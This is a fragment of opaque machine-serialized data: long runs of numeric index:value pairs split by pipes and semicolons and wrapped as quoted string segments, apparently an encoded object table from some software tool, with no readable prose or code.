19|3:586|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:587|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:588|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:589|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:590|15:325|4:423|17:24|18:24|5:'
- ..'460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:591|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:592|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:593|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:594|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:595|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:596|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:597|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:598|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:599|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:600|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:601|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:602|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:603|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:604|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:605|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:606|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:607|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:609|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:610|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|'
- ..'6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:611|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:612|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:613|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:614|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:615|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:616|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:617|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:618|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:619|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:620|15:21|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:460|14:461|3:621|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:622|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:623|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:624|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:625|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:626|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:627|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:628|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:629|15:153|4:423|17:24|18:24|5:19|5:19;'
- ..'n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:630|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:631|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:632|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:633|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:634|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:635|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:636|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:637|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:638|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:639|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:640|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:641|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:642|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:643|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:644|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:645|15:21|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:646|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:647|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:648|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|'
- ..'6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:649|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:650|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:651|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:652|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:653|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:654|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:655|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:656|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:657|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:658|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:659|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:660|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:661|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:662|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:663|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:664|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:665|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:666|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:667|15:153|4:423|17:24|18:24|5:19|5:19;n;3'
- ..'|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:668|15:669|4:670;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:671|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:672|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:673|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:674|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:675|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:676|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;9|9:677|10:678;p;1|1:421|2:2|5:19|3:679|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:680|15:21|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:681|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:682|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:683|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:684|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:685|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:686|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:687|2:2|5:19|3:688|15:689|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:693|2:2|5:19|3:694|15:297|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:695|2:2|5:19|3:696|15:567|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:697|2:2|5:19|3:698|1'
- ..'5:699|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:700|2:2|5:19|3:701|15:702|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:703|2:2|5:19|3:704|15:153|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:705|2:2|5:19|3:706|15:707|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:708|2:2|5:19|3:709|15:21|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:710|2:2|5:19|3:711|15:712|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:713|2:2|5:19|3:714|15:715|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:716|2:2|5:19|3:717|15:718|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:719|2:2|5:19|3:720|15:721|4:690|31:7|17:24|18:24|5:19|5:19;n;11|22:691|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:722|2:2|5:19|3:723|15:567|4:724|31:7|17:25|18:24|5:19|5:19;n;11|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;9|9:725|10:726;p;1|1:727|2:2|3:728|15:729|4:730|17:24|18:24;n;15|22:731;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:722|2:2|5:19|3:732|15:21|4:724|31:7|17:25|18:24|5:19|5:19;n;11|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:722|2:2|5:19|3:733|15:297|4:724|31:7|17:25|18:24|5:19|5:19;n;11|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;9|9:725|10:734;p;1|1:722|2:2|5:19|3:735|15:153|4:724|31:7|17:25|18:24|5:19|5:19;n;11|24:25;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:727|2:2|3:736|15:737|4:730|17:24|18:24;n;15|22:738;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:727|2:2|3:739|15:740|4:730|17:24|18:24;n;15|22:731;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:741|2:2|5:742|3:743|15:744|4:745|31:7|17:24|18:24|5:742|5:742;n;16|22:746;3'
- ..'|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:727|2:2|3:747|15:748|4:730|17:24|18:24;n;15|22:731;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:727|2:2|3:749|15:750|4:730|17:24|18:24;n;15|22:738;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|1:727|2:2|3:751|15:752|4:730|17:24|18:24;n;15|22:731;3|5:692|4:6|6:7|7:8|8:9|5:692|5:692;p;1|2:2|3:753|15:754|4:755;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:756|15:153|4:757|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:758|15:153|4:759|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;2;n;1|2:2|3:760|15:153|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|3:761|15:153|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:10|10:762;4|9:10|10:763;4|9:10|10:764;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:766|15:767|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:768;9|9:10|10:769;9|9:10|10:770;p;10|5:32|3:771|15:767|16:772|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:773|15:767|16:774|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:775|15:767|16:776|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:777;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:778|15:767|16:779|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;1|1:73|5:37|3:780|15:767|16:781|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:782|15:767|16:783|4:87|17:24|5:84|5:84;n;7;9|9:185|10:784;9|9:10|10:785;p;12|1:45|25:89;12|1:45|25:9'
- ..'0;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:786|15:787|16:788|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:790;9|9:119|10:791;p;1|1:113|5:84|3:792|15:767|16:793|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:124|10:794;9|9:158|10:795;9|9:237|10:796;p;1|1:113|5:32|3:797|15:767|16:798|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;9|9:237|10:799;9|9:158|10:800;p;1|1:113|5:131|3:801|15:802|16:803|4:135|17:25|18:25|5:131|5:131;n;11;9|9:804|10:805;9|9:223|10:806;p;1|1:113|5:19|3:807|15:808|16:809|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:810;9|9:119|10:811;p;1|1:113|5:19|3:812|15:808|16:813|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:32|3:814|15:787|16:815|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:816;9|9:119|10:817;p;1|1:113|5:19|3:818|15:819|16:820|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:252|10:821;p;1|1:113|5:84|3:822|15:823|16:824|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:162|10:825;p;1|1:113|5:9|3:826|15:819|16:827|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:19|3:828|15:819|16:829|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:178|10:830;9|9:391|10:831;9|9:176|10:832;p;1|1:113|5:9|3:833|15:819|16:834|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:176|10:835;p;1|1:113|5:131|30:187|3:836|15:802|16:837|4:190|17:25|18:25|5:131|5:131;n;11|22:191;p;1|1:113|5:131|3:838|15:839|16:840|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;p;1|1:113|5:32|3:841|15:767|16:842|4:128|27:25|17:25|18:24|5:32|5:32;n;11'
- ..'|22:118|24:129;13|28:205|29:157;9|9:162|10:843;p;1|1:113|5:84|3:844|15:845|16:846|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:847;9|9:258|10:848;p;1|5:19|3:849|15:787|16:850|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:851;9|9:217|10:852;9|9:260|10:853;p;1|1:113|5:131|3:854|15:802|16:855|4:135|17:25|18:25|5:131|5:131;n;11;9|9:221|10:856;9|9:804|10:805;p;1|1:113|5:131|30:187|3:857|15:802|16:858|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:221|10:859;9|9:192|10:860;p;1|1:113|5:84|3:861|15:845|16:862|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:863;9|9:258|10:864;p;1|1:113|5:131|3:865|15:839|16:866|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:867;p;1|5:19|3:868|15:787|16:869|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:870;9|9:217|10:871;p;1|1:113|5:19|3:872|15:767|16:873|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;9|9:124|10:794;9|9:237|10:874;p;1|1:113|5:19|3:875|15:876|16:877|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:84|3:878|15:787|16:879|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:124|10:880;9|9:260|10:881;p;1|1:113|5:19|3:882|15:808|16:883|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:252|10:884;p;1|1:113|3:885|15:787|16:886|4:247|27:25|17:157|18:25;n;11|24:25;9|9:256|10:887;4|9:258|10:888;9|9:260|10:889;p;1|5:84|3:890|15:767|16:891|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:268|10:892;9|9:265|10:893;9|9:221|10:894;9|9:268|10:895;9|9:265|10:896;9|9:10|10:897;p;1|5:32|3:898|15:823|16:899|4:274|31:7|18:24|5:32|5:32;n;9|9:265|10:900;9|9:270|10:901;p;1|5:19|3:902|15:787|16:903|4:213|17:24|18:214|5:19|5:19;n;9|9:904|10:905;9|9:260|10:906;p;1|1:113|5:9|3:907|15:908|16:909|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:910;9|9:169|10:911;9|9:171|10:912;p;1|1:113|5:84|3:913|15:767|16:914|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:15'
- ..'8|10:915;9|9:158|10:916;9|9:162|10:917;9|9:160|10:918;9|9:162|10:919;9|9:158|10:920;p;1|1:113|5:19|3:921|15:922|16:923|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:32|3:924|15:767|16:925|4:312|27:25|18:25|5:32|5:32;n;11|24:25;9|9:217|10:926;9|9:306|10:927;4|9:340|10:928;p;1|5:19|3:929|15:787|16:930|4:234|17:24|18:24|5:19|5:19;n;9|9:260|10:931;9|9:318|10:932;9|9:124|10:870;9|9:124|10:933;9|9:904|10:934;p;1|1:113|5:84|3:935|15:845|16:936|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|1:113|5:19|3:937|15:938|16:939|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;9|9:391|10:940;9|9:178|10:941;p;1|1:113|5:19|3:942|15:808|16:943|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:176|10:944;9|9:178|10:945;9|9:391|10:946;p;1|1:113|5:19|3:947|15:876|16:948|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:949|15:938|16:950|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;4|9:350|10:951;9|9:252|10:952;9|9:119|10:953;p;1|1:113|5:32|3:954|15:767|16:955|4:312|27:25|18:25|5:32|5:32;n;11|24:25;p;1|1:113|5:84|3:956|15:845|16:957|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:252|10:958;p;1|5:19|3:959|15:767|16:960|4:349|31:7|5:19|5:19;n;4|9:350|10:961;9|9:158|10:962;p;1|1:113|5:84|3:963|15:845|16:964|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:965;9|9:258|10:966;p;1|1:113|5:19|3:967|15:922|16:968|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;9|9:904|10:969;9|9:308|10:970;9|9:904|10:971;9|9:904|10:972;9|9:904|10:973;4|9:303|10:974;p;1|1:113|5:9|3:975|15:908|16:976|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:162|10:977;p;1|1:113|5:19|3:978|15:839|16:979|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:119|10:980;p;1|1:113|5:84|3:981|15:982|16:983|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;p;1|5:19|3:984|15:767|16:985|4:349|31:7|5:19|5:19;n;4|9:350|10:986;9|9:162|10:987;4|9:353|10:988;p;1|'
- ..'1:113|5:380|30:187|14:381|3:989|15:938|16:990|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;9|9:391|10:991;9|9:178|10:992;p;1|1:113|5:32|3:993|15:938|16:994|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;p;p;p;p;2;n;1|2:2|5:131|14:395|3:995|15:996|4:398|5:131|5:131;n;4|9:141|10:997;p;1|2:2|5:131|14:395|3:998|15:21|4:398|5:131|5:131;1|1:403|2:2|5:404|3:999|15:1000|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:1001|15:996|4:414|5:131|5:131;n;4|9:141|10:1002;p;1|2:2|5:131|14:395|3:1003|15:21|4:398|5:131|5:131;n;4|9:141|10:1004;p;1|2:2|5:131|14:395|3:1005|15:996|4:419|18:24|5:131|5:131;n;4|9:258|10:1006;p;7|1:420;p;1|1:421|2:2|5:19|3:1007|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1008|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:1009|15:996|4:427;n;4|9:428|10:1010;p;1|2:2|3:1011|15:996|4:467;n;4|9:428|10:1012;4|9:468|10:1013;p;1|2:2|3:1014|15:21|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:428|10:1015;p